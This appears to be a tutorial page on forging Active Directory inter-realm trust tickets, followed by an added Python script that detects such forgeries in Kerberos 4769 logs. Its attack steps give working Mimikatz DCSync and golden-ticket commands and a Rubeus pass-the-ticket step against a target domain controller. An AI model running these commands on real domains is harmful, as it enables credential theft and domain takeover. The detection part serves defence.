Forge Trust Ticket

The domain Kerberos service account (KRBTGT) is used to sign and encrypt every ticket-granting ticket (TGT), which is what lets a TGT be used throughout the domain and presented to any DC in it. KRBTGT is effectively the trust anchor of the domain, and that is why losing control of the KRBTGT account password hash equates to losing control of the domain. The same applies to a trust account: its key is the anchor for tickets crossing that trust.

Exploitation

1. The first step is to retrieve the trust key. This is achieved by DCSyncing the trust account from the domain controller with Mimikatz:

# Dumping the trust key with Mimikatz
lsadump::dcsync /user:$domain$

2. We can then create the trust ticket with Mimikatz as well, passing the trust key dumped in step 1 as the RC4 key:

# Creating the inter-realm trust ticket with Mimikatz ($trustkey is the key from step 1)
kerberos::golden /domain:$domain /sid:$domainsid /rc4:$trustkey /user:Administrator /service:krbtgt /target:$targetdomain /ticket:trust.kirbi

3. With the ticket saved to a file, we use it to request a TGS for the targeted service, in this case CIFS in the target domain, with Rubeus.exe:

# Requesting a service ticket with the forged trust ticket and injecting it (/ptt)
.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/$targetdomain /ptt /dc:$targetdc

4. Because we used the /ptt argument, Rubeus has already injected the ticket into the current logon session, and we should now be able to access the target domain controller. A trivial way to verify this is to list the contents of the target domain controller's administrative shares:

# Confirm access with net use
net use \\$targetdc\admin$

# List the contents of the target domain controller
dir \\$targetdc\admin$
dir \\$targetdc\c$
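Added here as a defender-side example, not part of the original page: a Python check that looks for the gap this technique leaves in the logs. A legitimate cross-realm access first asks its own KDC for a referral TGT (a 4769 for krbtgt/<target realm> in the source domain), whereas a forged trust ticket skips that step and only shows up as a 4769 in the target domain. The realm names, timestamps and events are constructed, and the field names follow the 4769 event XML; the RC4 signal assumes the domain otherwise enforces AES.

```python
"""Flag target-domain 4769 events from a trusted realm's accounts that have no
matching referral in the source domain's logs. All events are constructed."""
from datetime import datetime, timedelta

SOURCE_REALM = "CHILD.CORP.LOCAL"  # assumed trusting (source) domain
TARGET_REALM = "CORP.LOCAL"        # assumed trusted (target) domain
WINDOW = timedelta(minutes=10)     # max age of a referral that explains a TGS
RC4 = "0x17"                       # TicketEncryptionType value for RC4-HMAC

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

# 4769 events from the TARGET domain's DCs; TargetDomainName is the realm of
# the account presenting the TGT, ServiceName the requested service (DC01$).
TARGET_4769 = [
    {"TimeCreated": "2024-05-01 09:00:05", "TargetUserName": "jsmith@CHILD.CORP.LOCAL",
     "TargetDomainName": "CHILD.CORP.LOCAL", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.1.2.3"},
    {"TimeCreated": "2024-05-01 09:30:00", "TargetUserName": "Administrator@CHILD.CORP.LOCAL",
     "TargetDomainName": "CHILD.CORP.LOCAL", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x17", "IpAddress": "10.1.2.50"},
]
# 4769 events from the SOURCE domain's DCs: a legitimate cross-realm access
# first obtains a referral TGT (ServiceName krbtgt/<target realm>) here.
SOURCE_4769 = [
    {"TimeCreated": "2024-05-01 09:00:01", "TargetUserName": "jsmith@CHILD.CORP.LOCAL",
     "TargetDomainName": "CHILD.CORP.LOCAL", "ServiceName": "krbtgt/CORP.LOCAL",
     "TicketEncryptionType": "0x12", "IpAddress": "10.1.2.3"},
]

def find_unreferred_cross_realm_tgs(target_events, source_events):
    """Return (user, ip, reasons) for target-domain 4769s by SOURCE_REALM accounts
    with no referral for the same user within WINDOW in the source-domain logs."""
    referrals = [e for e in source_events if e["ServiceName"].lower().startswith("krbtgt")]
    flagged = []
    for e in target_events:
        if e["TargetDomainName"].upper() != SOURCE_REALM:
            continue  # not a cross-realm request from the trusting domain
        t = _ts(e["TimeCreated"])
        if any(r["TargetUserName"].lower() == e["TargetUserName"].lower()
               and timedelta(0) <= t - _ts(r["TimeCreated"]) <= WINDOW
               for r in referrals):
            continue  # the source KDC issued the referral: expected path
        reasons = ["no referral TGS request logged in the source domain"]
        if e["TicketEncryptionType"] == RC4:  # assumes the domain is AES-only
            reasons.append("RC4 ticket where AES is expected")
        flagged.append((e["TargetUserName"], e["IpAddress"], reasons))
    return flagged
```

On real data the check needs the source domain's DC logs collected alongside the target domain's, with clocks in sync, and a missing referral is a lead to investigate rather than proof of forgery.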
